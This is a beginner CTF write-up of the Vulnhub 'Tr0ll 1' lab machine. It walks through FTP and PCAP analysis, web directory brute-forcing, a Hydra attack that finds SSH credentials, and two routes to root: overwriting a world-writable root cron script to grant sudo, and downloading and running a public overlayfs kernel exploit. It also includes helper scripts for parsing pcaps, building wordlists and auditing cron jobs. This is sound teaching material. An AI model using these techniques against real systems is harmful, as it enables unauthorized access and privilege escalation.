Tr0ll 1 Writeup (Vulnhub Beginner Machine)
Tr0ll was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!
Overview
Tr0ll 1 is a beginner Linux machine from Vulnhub. This box plays with several basic cybersecurity concepts, which makes it perfect for OSCP prep. Warning: you might get a bit frustrated :D!
We start by enumerating the FTP service and analysing a captured PCAP file, which at first looks like a dead end. Next, we enumerate the Apache web server, crawling through directories while getting trolled at every step. Eventually, we find a valid pair of SSH credentials.
Once inside, we discover two paths to root. Either we abuse a world-writable script that a root cron job runs, modifying it so that it grants us full privileges, or we exploit the outdated Linux kernel and get a root shell directly.
Nmap scan
Starting with Nmap scan.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 192.168.1.55 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 09:19 EDT
Nmap scan report for 192.168.1.55
Host is up (0.00039s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.84
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:25:9C:72 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.1.55
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
The Nmap scan showed three open ports: 21 (FTP, vsftpd 3.0.2 with anonymous login allowed), 22 (OpenSSH 6.6.1p1) and 80 (Apache 2.4.7, whose robots.txt lists a single disallowed entry, /secret). Let's enumerate these services one by one.
FTP enumeration & inspecting FTP network traffic
As the Nmap output shows, the FTP server allows anonymous login, so anyone can log in with the guest account and access whatever the server exposes.
I logged in as "anonymous" (any password is accepted) and found a single file, "lol.pcap", which I downloaded.
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.1.55
Connected to 192.168.1.55.
220 (vsFTPd 3.0.2)
Name (192.168.1.55:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||24822|).
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||15347|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |********************| 8068 19.62 MiB/s 00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (10.88 MiB/s)
The file we got is a PCAP (packet capture) file.
PCAP files (short for Packet Capture) are files used to store network traffic data captured over a network. They contain raw network packets, including headers and payloads, which can be analyzed for various purposes such as troubleshooting, performance monitoring, or security investigations. (ChatGPT)
I opened it in Wireshark, the network protocol analyzer.

The file stored a captured session between an FTP server and a client. Since FTP sends everything in the clear, we can read every request and response, including the commands entered, the credentials and the transferred files.
[screenshot: exposed communication between the FTP server and the client]
Among the traffic was the content of a transferred file, "secret_stuff.txt".
[screenshot: message extracted from the network packet]
It was just a taunting message, so this looked like a dead end. The box is called "Tr0ll", after all, so this kind of thing is to be expected. Not much we can do here yet.
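Reading the capture yourself, as an added example (my code, not part of the original writeup): the parser below handles the legacy pcap container and Ethernet/IPv4/TCP framing, which is all a capture like lol.pcap needs, and separates the FTP control channel from the data transfer. The sample capture inside it is constructed, with a made-up hint text; run it with the path to lol.pcap to see the real session.

```python
"""Pull cleartext FTP out of a legacy pcap without Wireshark.

Added example, not part of the original writeup. It parses the classic
libpcap container (magic 0xa1b2c3d4 / 0xd4c3b2a1, Ethernet link type;
pcapng and the nanosecond variant are deliberately not handled),
concatenates TCP payloads per (src, sport, dst, dport) in capture order,
and separates the FTP control channel (port 21) from whatever moved over
a data channel. Checksums and sequence numbers are ignored, which is fine
for a tidy capture but not for out-of-order or retransmitted traffic.
The sample capture is constructed below so the script runs offline.
"""
import struct
import sys
from collections import OrderedDict

LINKTYPE_ETHERNET = 1


def _tcp_payload(frame):
    """Return ((src, sport, dst, dport), payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType 0x0800 = IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[9] != 6:                                       # protocol 6 = TCP
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    data = tcp[(tcp[12] >> 4) * 4:]                      # skip TCP header + options
    if not data:
        return None
    return (src, sport, dst, dport), data


def tcp_streams(pcap_bytes):
    """Ordered {(src, sport, dst, dport): bytes} built from every TCP segment carrying data."""
    magic = struct.unpack_from("<I", pcap_bytes, 0)[0]
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a legacy pcap (pcapng / nanosecond variants not supported)")
    linktype = struct.unpack_from(end + "I", pcap_bytes, 20)[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("unsupported link type %d" % linktype)
    streams = OrderedDict()
    off = 24                                             # 24-byte global header
    while off + 16 <= len(pcap_bytes):                   # 16-byte record header
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(end + "IIII", pcap_bytes, off)
        off += 16
        frame = pcap_bytes[off:off + incl_len]
        off += incl_len
        hit = _tcp_payload(frame)
        if hit:
            key, data = hit
            streams[key] = streams.get(key, b"") + data
    return streams


def ftp_artifacts(streams, control_port=21):
    """Split streams into control-channel lines and data-channel transfers."""
    control, transfers = [], []
    for (src, sport, dst, dport), data in streams.items():
        text = data.decode("latin-1")
        if control_port in (sport, dport):
            control.extend(line for line in text.splitlines() if line)
        else:
            transfers.append(text)   # active (port 20) or passive data connection
    return control, transfers


# --- constructed sample capture (not the box's lol.pcap) --------------------
def _frame(src, sport, dst, dport, data):
    """Ethernet/IPv4/TCP frame with zeroed checksums, enough for the parser above."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 0xFFFF, 0, 0) + data
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(x) for x in src.split(".")),
                     bytes(int(x) for x in dst.split("."))) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def _pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1407600000 + i, 0, len(frame), len(frame)) + frame
    return out


SAMPLE_PCAP = _pcap([
    _frame("10.0.0.1", 21, "10.0.0.2", 40001, b"220 (vsFTPd 3.0.2)\r\n"),
    _frame("10.0.0.2", 40001, "10.0.0.1", 21, b"USER anonymous\r\n"),
    _frame("10.0.0.1", 21, "10.0.0.2", 40001, b"331 Please specify the password.\r\n"),
    _frame("10.0.0.2", 40001, "10.0.0.1", 21, b"PASS guest@example.com\r\n"),
    _frame("10.0.0.2", 40001, "10.0.0.1", 21, b"RETR secret_stuff.txt\r\n"),
    _frame("10.0.0.1", 20, "10.0.0.2", 40002, b"constructed hint: look for sup3rs3cr3tdirlol\r\n"),
])

if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    control, transfers = ftp_artifacts(tcp_streams(raw))
    print("\n".join(control))
    for i, body in enumerate(transfers, 1):
        print("--- data transfer %d ---\n%s" % (i, body))
```

Because it concatenates segments in capture order and ignores sequence numbers, this is a triage tool, not a replacement for Wireshark's Follow TCP Stream on a messy capture. Credentials and file content in an FTP session are in the clear either way, which is the point of this section.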
Web enumeration
I visited the Apache HTTP server and was greeted with another taunting message.

I looked at the page source and the network traffic but found nothing interesting. Then I ran Gobuster for directory brute-forcing, which returned a couple of interesting results.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://192.168.1.55" -w /usr/share/wordlists/dirb/common.txt -t 64 -r
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.55
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 288]
/.htpasswd (Status: 403) [Size: 288]
/.hta (Status: 403) [Size: 283]
/index.html (Status: 200) [Size: 36]
/robots.txt (Status: 200) [Size: 31]
/server-status (Status: 403) [Size: 292]
/secret (Status: 200) [Size: 37]
Progress: 4614 / 4615 (99.98%)
"robots.txt" contained a single entry, "/secret", which Gobuster found as well.

When I visited the “/secret” page, I saw another trolling image.

Getting trolled constantly & gaining access via SSH
This seemed like a dead end as well, so I went back over everything I had found so far, trying to figure out what I had missed. The "secret_stuff" message mentioned "sup3rs3cr3tdirlol", and requesting "/sup3rs3cr3tdirlol" on the web server worked: to my surprise, I was served a directory listing.

It contained a file called "roflmao", which I downloaded for closer inspection. It was a 32-bit ELF binary; running it printed a message telling me to find the address "0x0856BF".
┌──(kali㉿kali)-[~]
└─$ chmod +x roflmao
┌──(kali㉿kali)-[~]
└─$ ls -la roflmao
-rwxrwxr-x 1 kali kali 7296 May 17 12:25 roflmao
┌──(kali㉿kali)-[~]
└─$ file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
┌──(kali㉿kali)-[~]
└─$ ./roflmao
Find address 0x0856BF to proceed
IMPORTANT: never run an unknown binary from the internet on your own machine without checking it first (and preferably do it in a throwaway VM). I decompiled this one with Ghidra as well; it is good practice to know exactly what a program does before executing it ;).
I loaded the binary in GDB and tried to inspect that address, but it is not mapped: the binary is not PIE and its first LOAD segment starts at 0x08048000 (readelf -l roflmao shows the same), so 0x0856BF lies well below anything in its address space and is not a real pointer at all.

Once again I had fallen down a rabbit hole. After a while I took the other approach that had already worked once and requested "/0x0856BF" on the web server. Like before, I got a directory listing with a couple of directories.

Inside was a "Pass.txt" file, which seemingly contained a password.
[screenshot: file "Pass.txt" containing a potential password]
Another file, "which_one_lol.txt", seemingly contained a list of usernames.
[screenshot: file "which_one_lol.txt" containing potential usernames]
I saved the potential usernames and the password and ran Hydra (an online login cracker) to test every combination against SSH. Unfortunately, Hydra found no matching pair.

Since it was obvious by now that this box trolls you wherever it can, a more lateral approach was needed. I spent a fair amount of time here, switching wordlists and trying FTP as well, with the nagging feeling that I was missing something.
Eventually I went back to the "/0x0856BF" listing and added the names of its files and directories to the password wordlist. That was the missing piece: Hydra found the pair user "overflow" with password "Pass.txt", literally the filename.

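The trick above, turning a directory listing into password candidates, as an added example (my code, not the writeup's). It assumes Apache's default autoindex HTML, and the listing embedded in it is constructed: the two filenames come from the box, the directory name is made up.

```python
"""Build a password wordlist from an Apache directory listing.

Added example, not part of the original writeup. It parses the HTML of
an Apache autoindex page (such as /0x0856BF on the box), keeps every
linked file and directory name, and emits the variants worth feeding to
Hydra: the raw name, the name without extension, and lower/upper-case
forms. The listing below is constructed for the example; point the
script at a saved copy of the real page to use it for real.
"""
import os
import sys
from html.parser import HTMLParser
from urllib.parse import unquote


class _HrefCollector(HTMLParser):
    """Collect href attributes of <a> tags in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def listing_entries(html):
    """File and directory names linked from an autoindex page, deduplicated, in order."""
    collector = _HrefCollector()
    collector.feed(html)
    names = []
    for href in collector.hrefs:
        # "?C=N;O=D" etc. are the column-sort links, "/" is Parent Directory
        if href.startswith(("?", "/", "#", "http://", "https://")):
            continue
        name = unquote(href.rstrip("/"))
        if name and name not in names:
            names.append(name)
    return names


def password_candidates(names):
    """Variants of each name that a lazy admin (or a troll) might use as a password."""
    out = []
    for name in names:
        stem = os.path.splitext(name)[0]
        for cand in (name, stem, name.lower(), name.upper(), stem.lower(), stem.upper()):
            if cand and cand not in out:
                out.append(cand)
    return out


# Constructed listing: Pass.txt and which_one_lol.txt are from the box, some_dir is made up.
SAMPLE_LISTING = """<html><head><title>Index of /0x0856BF</title></head><body>
<h1>Index of /0x0856BF</h1>
<table>
<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th></tr>
<tr><td><a href="/">Parent Directory</a></td></tr>
<tr><td><a href="some_dir/">some_dir/</a></td></tr>
<tr><td><a href="Pass.txt">Pass.txt</a></td></tr>
<tr><td><a href="which_one_lol.txt">which_one_lol.txt</a></td></tr>
</table></body></html>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        html = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        html = SAMPLE_LISTING
    print("\n".join(password_candidates(listing_entries(html))))
```

Save the output as a file and hand it to Hydra as the password list, for example hydra -L users.txt -P candidates.txt -t 4 ssh://192.168.1.55; the same candidates are worth trying as usernames too, since the box already showed that nothing here has to make sense.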
I logged into the machine over SSH as "overflow". Now we have to get to root.
Privilege escalation by overwriting cronjob (1st approach, probably intended way)
From here I found two ways to root the box. I'll show both: the one that is probably intended, and the one I stumbled on later.
I transferred LinPEAS to the machine to save myself some of the manual post-exploitation enumeration. It produced a lot of output, so let's focus on what is interesting.
One odd entry among the writable files is "/var/log/cronlog".
[screenshot: strange writable file "cronlog" found by LinPEAS]
The file is world-writable and holds a single crontab-style line that runs a script called "cleaner.py" every two minutes. "/var/log" is not a location cron reads, so this file is a hint about a job configured elsewhere rather than the job itself; the rest of the walkthrough shows that the job really does run as root.
overflow@troll:/$ ls -la /var/log/cronlog
-rwxrwxrwx 1 root root 23 Aug 13 2014 /var/log/cronlog
overflow@troll:/$ cat /var/log/cronlog
*/2 * * * * cleaner.py
I located "cleaner.py" and looked at its content. It is owned by root and, like the cronlog file, world-writable.
overflow@troll:/var/log$ find / -name cleaner.py 2>/dev/null
/lib/log/cleaner.py
overflow@troll:/var/log$ ls -la /lib/log/cleaner.py
-rwxrwxrwx 1 root root 96 Aug 13 2014 /lib/log/cleaner.py
overflow@troll:/var/log$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')   # wipes everything under /tmp every time the job runs
except:
    sys.exit()
Note what the script does: every two minutes it empties /tmp, so anything you stage there disappears quickly. The plan was simple: replace the body of this root-owned, world-writable script with code that grants "overflow" unrestricted privileges by appending an entry to "/etc/sudoers". Because the cron job runs as root, the write succeeds at the next run.
[screenshot: modified "cleaner.py" script, writing the new entry to "/etc/sudoers"]
Within two minutes the job had run and "overflow" could use sudo without restriction, which sudo -l confirms:
overflow@troll:/$ sudo -l
sudo: unable to resolve host troll
[sudo] password for overflow:
Matching Defaults entries for overflow on troll:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User overflow may run the following commands on troll:
(ALL : ALL) ALL
overflow@troll:/$ sudo su
sudo: unable to resolve host troll
root@troll:/# id
uid=0(root) gid=0(root) groups=0(root)
root@troll:/# cd /root
root@troll:~# ls -la
total 28
drwx------ 3 root root 4096 Aug 13 2014 .
drwxr-xr-x 21 root root 4096 Aug 9 2014 ..
-rw------- 1 root root 0 Aug 13 2014 .bash_history
-rw-r--r-- 1 root root 58 Aug 10 2014 proof.txt
-rw-r--r-- 1 root root 74 Aug 10 2014 .selected_editor
drwx------ 2 root root 4096 Aug 10 2014 .ssh
-rw------- 1 root root 5538 Aug 13 2014 .viminfo
root@troll:~# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
I switched to root with "sudo su" and read "proof.txt" from "/root", where the flag was patiently waiting for us.
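The general check behind this finding, as an added example (my code, not the writeup's or the box's): an audit that walks crontab lines, resolves the program each job runs and flags executables that are group/world-writable or missing from PATH. It builds its own sample data in a temporary directory so it runs without root; the file and job names in the demo are constructed, chosen to mirror cleaner.py.

```python
"""Find cron jobs whose executable an unprivileged user can modify.

Added example, not part of the original writeup. It reads crontab-style
lines (user crontab: five time fields then the command; system crontab
or /etc/cron.d: five time fields, a user, then the command), resolves
the program each job runs the way cron does (bare names are looked up in
the crontab's own PATH= setting, falling back to the directories passed
in), and reports jobs whose executable is group- or world-writable or
does not exist. The first condition is what turned cleaner.py on this
box into a root shell; the second is the PATH-hijack variant. The demo
data is constructed in a temporary directory so the script runs anywhere.
"""
import os
import shlex
import stat
import tempfile

ISSUE_WRITABLE = "executable is group/world-writable"
ISSUE_MISSING = "program not found"


def parse_cron_line(line, system_format=False):
    """Return (schedule, user, command) or None for blank, comment and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if "=" in parts[0] and not parts[0].startswith("@"):
        return None                       # PATH=..., MAILTO=... and friends
    n_sched = 1 if parts[0].startswith("@") else 5
    if len(parts) < n_sched + (2 if system_format else 1):
        return None
    schedule = " ".join(parts[:n_sched])
    rest = parts[n_sched:]
    user = None
    if system_format:
        user, rest = rest[0], rest[1:]
    return schedule, user, " ".join(rest)


def resolve_program(command, path_dirs):
    """Path cron would execute for this command, or None if it cannot be found."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    if not argv:
        return None
    prog = argv[0]
    if "/" in prog:
        return prog if os.path.isfile(prog) else None
    for d in path_dirs:
        cand = os.path.join(d, prog)
        if os.path.isfile(cand):
            return cand
    return None


def writable_by_others(path):
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(lines, path_dirs, system_format=False):
    """Findings as dicts; a PATH= line inside the crontab overrides path_dirs."""
    findings = []
    for line in lines:
        stripped = line.strip()
        if stripped.startswith("PATH="):
            path_dirs = stripped[len("PATH="):].strip('"').split(":")
            continue
        parsed = parse_cron_line(line, system_format)
        if parsed is None:
            continue
        schedule, user, command = parsed
        prog = resolve_program(command, path_dirs)
        if prog is None:
            issue = ISSUE_MISSING
        elif writable_by_others(prog):
            issue = ISSUE_WRITABLE
        else:
            continue
        findings.append({"schedule": schedule, "user": user, "command": command,
                         "program": prog, "issue": issue})
    return findings


def demo():
    """Constructed scenario mirroring the box: a root job running a world-writable script."""
    with tempfile.TemporaryDirectory() as libdir:
        for name, mode in (("cleaner.py", 0o777), ("rotate.sh", 0o755)):
            path = os.path.join(libdir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        lines = [
            "PATH=/usr/bin:" + libdir,
            "# clean temporary files (same schedule as /var/log/cronlog on the box)",
            "*/2 * * * * cleaner.py",
            "0 3 * * * rotate.sh",
            "@reboot /opt/missing/agent --start",
        ]
        return audit_cron(lines, ["/usr/bin"])


if __name__ == "__main__":
    for f in demo():
        print("%-12s %-6s %-36s %s" % (f["schedule"], f["user"] or "-", f["command"], f["issue"]))
```

On a real host, feed it /etc/crontab and /etc/cron.d/* with system_format=True and each user's crontab -l output with the default. A writable executable on a root job is the primitive abused above; a missing program, when a directory earlier in PATH is writable, is the same outcome by a different route.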
Privilege escalation by kernel exploitation (2nd approach, probably unintended way)
I found the second approach some time later. Running LinPEAS again, it highlights the kernel version as a privilege-escalation vector, because this kernel is vulnerable to known public exploits. The box is from 2014, so around 11 years old.
[screenshot: LinPEAS highlighted the Linux kernel version as a PE vector]
Researching "3.13.0-32-generic" quickly turns up a matching exploit. I went with the "overlayfs Local Privilege Escalation" exploit from Exploit-DB.

CVE-2015-1328 is a local privilege escalation in the overlayfs implementation shipped in Ubuntu kernels of that era. When an overlay filesystem was mounted inside a user namespace, the kernel did not properly check permissions while creating files in the upper (writable) layer, so an unprivileged local user could create files in directories they should not be able to touch. The public exploit uses this to write /etc/ld.so.preload pointing at a shared library that spawns a root shell, which is exactly what the output below shows.
I served the exploit source from my Kali machine on port 9000, fetched it on the target, compiled it with GCC and ran it. Two caveats: kernel exploits can crash the box, so take a snapshot first, and if cleaner.py is still in its original form, /tmp is wiped every two minutes, so don't leave the source sitting there.
overflow@troll:/tmp$ wget http://192.168.1.84:9000/exploit.c
--2025-05-18 04:56:46-- http://192.168.1.84:9000/exploit.c
Connecting to 192.168.1.84:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
Saving to: ‘exploit.c’
100%[======================================>] 5,119 --.-K/s in 0s
2025-05-18 04:56:46 (729 MB/s) - ‘exploit.c’ saved [5119/5119]
overflow@troll:/tmp$ gcc -o exploit exploit.c
overflow@troll:/tmp$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
# cd /root
# ls -la
total 32
drwx------ 3 root root 4096 Aug 13 2014 .
drwxr-xr-x 21 root root 4096 Aug 9 2014 ..
-rw------- 1 root root 39 May 18 04:48 .bash_history
-rw-r--r-- 1 root root 74 Aug 10 2014 .selected_editor
drwx------ 2 root root 4096 Aug 10 2014 .ssh
-rw------- 1 root root 5538 Aug 13 2014 .viminfo
-rw-r--r-- 1 root root 58 Aug 10 2014 proof.txt
# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
After a second or so I had a root shell and could read "proof.txt" in "/root". Pick whichever approach you like more :D.
Summary & final thoughts
Tr0ll is a beginner machine from Vulnhub and a good playground for beginners as well as solid OSCP prep. It trolls you constantly, so keep your lateral thinking switched on. Along the way we met an FTP server hosting an odd PCAP file, which led us to a hidden directory on the Apache server. An ELF binary there held another hint, leading us to a username list and a password file. Hydra found a valid pair of credentials (once the filenames themselves went into the wordlist) and we got in over SSH. From there, two routes to root were open: modify the world-writable script run by a root cron job, or exploit the outdated kernel.

In my opinion this box is a great test of nerves and of critical, lateral thinking rather than of technical skill. You will inevitably get worn down by it at some point, which is what forces you to think outside the box and look for non-standard solutions. Recommended to anyone who is up for a non-straightforward (almost abstract) challenge: the difficulty is mental, not technical.






